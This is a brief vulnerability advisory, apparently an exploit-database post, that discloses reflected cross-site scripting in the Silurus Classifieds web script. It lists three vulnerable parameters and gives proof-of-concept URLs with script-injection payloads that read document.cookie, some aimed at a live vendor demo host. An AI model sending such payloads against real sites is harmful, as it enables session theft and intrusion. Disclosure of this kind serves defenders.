Silurus Classifieds suffers from cross site scripting vulnerabilities.
2b2f51aaf7864a4be12de605b50a787b5647bde22df6bf8ccb60b840195f9c16
/*
_____ _ ___ __
| ____|_ _(_) \ \ / /_ _ _ _
| _| \ \ / / | |\ \ /\ / / _` | | | |
| |___ \ V /| | | \ V V / (_| | |_| |
|_____| \_/ |_|_| \_/\_/ \__,_|\__, |
|___/
_____
|_ _|__ __ _ _ __ ___
| |/ _ \/ _` | '_ ` _ \
| | __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|
Silurus Classifieds Remote XSS Vulnerabilities
Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : http://snowhall.com/silurus
Greetings : Mizoz, Zuka, str0ke, 599eme Man.
*/
[+] Exploit XSS:
- Vulnerable code in category.php (id).
- Vulnerable code in search.php (keywords).
- Vulnerable code in wcategory.php (id).
- Poc:
http://127.0.0.1/category.php?ID=[XSS]
http://127.0.0.1/search.php?go=1&keywords=[XSS]
http://127.0.0.1/wcategory.php?ID=[XSS]
http://silurus.snowhall.com/category.php?ID="><script>alert(document.cookie);</script>
http://silurus.snowhall.com/search.php?go=1&keywords="><script>alert(document.cookie);</script>
http://silurus.snowhall.com/wcategory.php?ID="><script>alert(document.cookie);</script>